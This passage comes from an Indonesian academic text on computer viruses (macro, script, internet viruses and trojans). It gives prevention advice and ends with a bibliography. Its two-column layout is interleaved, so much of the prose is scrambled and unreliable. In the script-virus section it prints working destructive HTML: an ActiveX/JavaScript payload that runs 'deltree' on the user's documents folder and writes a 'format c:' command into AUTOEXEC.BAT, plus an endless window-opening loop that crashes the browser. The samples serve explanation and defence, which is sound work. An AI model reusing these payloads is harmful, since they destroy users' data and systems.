disket yang tidak diketahui kebersihannya, + : menambahkan attribut maka sebaiknya kita melakukan pemeriksaan - : menghilangkan attribut terlebih dahulu dengan antivirus. Contoh-contoh R : attribut hanya baca (Read only) program antivirus yang cukup terkenal adalah A : attribut file archive McAfee VirusScan, Antiviral Toolkit Pro, dan S : attribut file aystem Norton Antivirus menggunakan H : attribut file tersembunyi Path : nama cabang (sub-directory) - Melakukan scan virus secara periodik pada Filename: nama file yang akan diproses hard disk. /S : melakukan proses diseluruh directory dan Walaupun sub-directory kemungkinan dari penyebaran virus, tetapi ada kita telah menjaga segala baiknya dilakukan pemeriksaan pada hard disk, 37 sebab mungkin saja terdapat virus baru atau instruksi-instruksi untuk menyebar virus maupun variasi virus yang belum bisa terdeteksi. melakukan manipulasi lainnya. Biasanya virus akan menulari/memodifikasi - Menginstal program resident pada komputer. file NORMAL.DOT yang memang ada pada setiap Untuk mencegah dan mendeteksi kerja virus komputer yang menggunakan Microsoft Word, kita bisa menggunakan program antivirus yang sebab file tersebut adalah file yang dijadikan sifatnya resident, residen adalah yang dimaksud dengan standar awal pengetikan dan juga merupakan file program yang menetap yang pertama kali dibuka oleh Microsoft Word ketika sementara pada memori komputer. Contoh dieksekusi. Tetapi ada juga virus yang tidak program residen adalah Scan McAfee Vshield melakukan manipulasi pada file ini tetapi membuat dan Norton Anti Virus. file DOT baru yang mengandung virus dan merubah program Microsoft Word untuk menggantikan file - Menggunakan program anti virus yang terbaru NORMAL.DOT itu dengan file buatan virus. Sebagai contoh virus Melissa yang sangat terkenal itu ingin merupakan virus macro Microsoft Word yang media memperkecil kemungkinan penularan virus, kita penyebarannya dapat melalui internet, mengirim harus selalu mengikuti perkembangan program dirinya sendiri lewat e-mail sebagai attachment. Memang seharusnya apabila kita anti virus sebab dengan semakin banyaknya virus-virus baru yang belum bisa terdeteksi oleh 3.8.2. antivirus yang lama, sehingga para pencipta - Penanggulangannya Ubah atribut seluruh document template program anti virus juga membuat program anti terutama file NORMAL.DOT menjadi read-only. virus yang lebih baru pula. Dengan demikian untuk virusvirus sederhana tidak akan mampu untuk menulari komputer - Periksa secara rutin registry Windows di bagian sebab virus tidak dapat menulis apapun pada \HKEY_CURRENT_USER\Software\Microsoft\ file NORMAL.DOT, tetapi ada juga virus yang Windows\CurrentVersion\Run, tidak terpengaruh oleh tindakan pencegahan ini. apakah menemukan sesuatu yang mencurigakan jika menemukan itu hapus bagian yang - Apabila kita tidak memiliki antivirus yang memadai dan Microsoft Word telah terkena mencurigakan itu. virus, hapus file NORMAL.DOT sebab 3.8. Virus Macro umumnya 3.8.1. NORMAL.DOT kembali dengan tanpa virus. Cara Kerja Umum program akan membuat file Cara kerja virus Macro yang akan dibahas adalah virus Microsoft Word. Virus akan menginfeksi file Microsoft (Document Word Template) dengan dan ekstension DOC - DOT Periksa setiap file dengan menggunakan program antivirus (usahakan yang terbaru) (Document), sebelum kita menggunakannya. dimana apabila kita menggunakan Microsoft Word untuk memanggil file-file tersebut maka macro dari virus akan dijalankan, didalam macro inilah terdapat - Apabila program antivirus tidak dapat mengatasi atau mendeteksinya, file document kita buka 38 dengan (program menggunakan pengetikan program paket Wordpad pada setiap Microsoft Windows ) lalu file dikonversi menjadi file RTF (Rich Text File), baru kemudian file RTF itu kita buka dengan Microsoft Word dan bila perlu kita konversi lagi menjadi document. Apabila Wordpad tidak dapat membuka file tersebut, bisa kita gunakan program pengetikan lainnya sebagai pengganti seperti Corel Word Perfect ataupun Adobe Type Manager. 3.9. Virus Script 3.9.1. komputer, tetapi berikut ini adalah isi dari file HTML yang mempunyai dampak lebih parah : <html><body> <object id="wss" classid="clsid:F935DC22-1CF0-11D0-ADB900C04FD58A0B"></object> <object id="sfso" classid="clsid:0D43FE01-F093-11CF-894000A0C9054228"></object> <script language="JavaScript"> wss.Run('deltree /y c:\mydocu~1'); sfso.CreateTextFile('c:\autoexec.bat',true).WriteLine ('format c:/u/q'); alert(‘Wait a moment.'); </script> </body></html> Cara Kerja Umum Script yang digunakan untuk file diatas Karena virus jenis ini biasanya terdapat pada file HTML maka virus ini akan beraksi setiap adalah kali kita menjelajah internet mengeksekusi program Active-X, dimana hasilnya dengan program Javascript directory tambahan menghapus Program browser yang sering menjadi target adalah kemudian merubah file AUTOEXEC.BAT komputer Microsoft Internet Explorer dan Netscape Navigator. menjadi berisi instruksi untuk memformat hard disk. Berikut ini adalah isi dari file INDEX.HTML yang Masih banyak lagi variasi dan kemungkinan suatu berisi virus, tetapi cukup tidak berbahaya : virus script melakukan aksinya oleh karena itu hal ini <HTML> <HEAD> <META HTTP-EQUIV="Refresh" CONTENT="1; URL=index.html"> <SCRIPT LANGUAGE="JavaScript"> <!-for (x=0;x<1;x) open("index.html"); </SCRIPT> </HEAD> </body> </HTML> tidak boleh diremehkan begitu saja. - isi dengan internet browser yang mendukung script tersebut. 3.9.2. seluruh juga c:\mydocu~1 Penanggulangannya Tingkatkan options security dari browser setiap kali kita merasa memasuki alamat internet yang berbahaya. - Set agar setiap kali browser menemukan suatu script agar selalu muncul pilihan apakah File tersebut apabila dijalankan oleh script itu ingin dijalankan atau tidak. Jadi kita browser yang mendukung Javascript maka akan bisa menyelidiki terlebih dahulu apakah sisi berakibat komputer akan membuka banyak sekali dari script tersebut berbahaya. browser hingga tidak terhingga sampai nantinya komputer akan mengalami hang atau crash. Sebab instruksi dari Javascript yang rawan dan memegang kendali penting memanggil diri sendiri tanpa pernah berhenti. seperti : AUTOEXEC.BAT; DOSSTART.BAT Mungkin dan sebagainya. berakibat fatal pada diatas adalah Set atribut menjadi read-only untuk file-file untuk contoh diatas - hanyalah tidak akan 39 - Ubah nama program file yang rawan dan HKEY_CLASSES_ROOT\exefile\shell\open\comma memegang kendali penting menjadi tidak nd. Untuk trojan adalah suatu program yang standar seperti : FORMAT.EXE; DEBUG.EXE ; DELTREE.EXE dan sebagainya. dikirimkan oleh seseorang kepada kita dimana program tersebut merugikan bagi kita. Trojan bisa - Periksa secara rutin registry Windows di berupa program perusak maupun program kendali. bagian Contoh trojan yang terkenal adalah Back Orifice dan \HKEY_CURRENT_USER\Software\Microsoft Netbus, apabila korban telah terkena salah satu dari \Windows\CurrentVersion\Run, apakah program ini maka apabila korban terhubung ke menemukan sesuatu yang mencurigakan jika jaringan atau internet, si pengirim trojan dapat menemukan mengendalikan komputer korban dari jauh, bahkan itu hapus bagian yang mencurigakan itu. tidak mustahil untuk mematikan atau merusak dari jauh. - Selalu membuat file cadangan dari registry Windows . 3.10.2. Penanggulangannya - 3.10. Virus dari Internet dan Trojan Scan virus setiap file yang tidak pasti kebersihannya dari virus. 3.10.1. Cara Kerja Umum Terutama yang berasal dari internet, harus tetap Virus dari internet bisa membawa virus-virus waspada walaupun kita menerima e-mail berisi lainnya, pada dasarnya virus dari internet proses file Microsoft Word atau executable atas nama pembuatannya kenalan sebab mungkin saja e-mail tersebut hampir sama dengan virus executable dan virus macro. Yang membedakannya merupakan perbuatan virus. adalah cara penularannya, virus jenis ini mampu untuk menyebar melalui media internet yaitu akan - mengirimkan dirinya sendiri ke internet setiap kali terjadi Periksa secara rutin registry Windows di bagian \HKEY_CURRENT_USER\Software\Microsoft\ hubungan antara Windows\CurrentVersion\Run, apakah komputer dengan internet. Contoh yang cukup menemukan sesuatu yang mencurigakan jika terkenal adalah virus Happy99 yaitu virus yang menemukan merubah mencurigakan itu. file WINSOCK.DLL yaitu file yang itu hapus bagian yang menangani hubungan internet suatu komputer yang berhubungan dengan socket di internet. Contoh lain - Set atribut file WINSOCK.DLL menjadi read- adalah Virus Pretty+Park yang juga menyebar only, untuk memperkecil kemungkinan virus secara otomatis lewat e-mail dengan mengirimkan untuk memanipulasinya. diri sendiri sebagai attachment, ciri-cirinya tidak ada reaksi apa-apa ketika dijalankan, tetapi meduplikat dirinya ke C:\windows\system\files32.vxd serta menambah suatu string pada registry Windows di lokasi - Catat tanggal, ukuran, dari file yang mencurigakan sebab akan berguna suatu saat apabila benar file tersebut mengandung virus. 40 DAFTAR PUSTAKA dan Praktek Aplikasi Bisnis. Andi Offset, Yogyakarta. Amperiyanto, Tri, 2003. Bermain-main dengan Virus Macro 2 : Menjelajah Word dan Excel. PT Elex Media Komputindo, http://securityresponse.symantec.com Kelompok Gramedia, Jakarta. (Diambil tanggal 23 Juni 2004) http://www.nai.com (Diambil tanggal 24 Juni 2004) http://www.vaksin.com (Diambil tanggal 25 Juni Bishop, Matt, 2003. Computer Security : Art and Science. Addison-Wesley, Pearson 2004) http://www.balikpapan.depkeu.go.id(Diambil tanggal Education, Inc., Boston. 24 Juni 2004) http://echo.or.id(Diambil tanggal 24 Juni 2004) Bustami, Ahmad, 1999. Cara Mudah Belajar http://www.viruslist.com(Diambil tanggal 25 Juni Internet, HomeSite dan HTML. Dinastindo, 2004) Kane, Jakarta. Pamela, 1995. Pembasmian dan Pengamanan Virus di Komputer Anda. Cobb, Stephen, 1990. The Stephen Cobb Complete Dinastindo, Jakarta. Book of PC and LAN Security. Windcrest Murugappan, Palani. Internet Simplified. Venton Books. Publishing. Cohen, Frederick B., 1994. A Short CourseOon Computer Viruses. John Wiley & Sons, Inc. Norton, Peter and Nielsen, Paul, 1992. Inside the Norton Antivirus. Brady Publishing, New Crume, Jeff, 2000. Inside Internet Security : What Hackers Dont’t Addison-Wesley, Want You To Pearson York. Know. Education Limited, London. Sudarisman, 1991. Pedoman Lengkap Komputer. PT Elex Media Komputindo, Kelompok Gramedia, Jakarta. Fogie, Seth and Peikari, Cyrus, 2002. Windows Internet Security : Protecting Your Critical Data. Prentice Hall PTR, Upper Saddle River, New Jersey. Frost, David, Beale, Ian and Frost, Chris, 1989. Pedoman Lengkap Virus Komputer. PT. Elex Media Komputindo, Jakarta. Hartono, Jogiyanto, 2001. Analisis & Desain Sistem Informasi : Pendekatan Terstruktur Teori Virus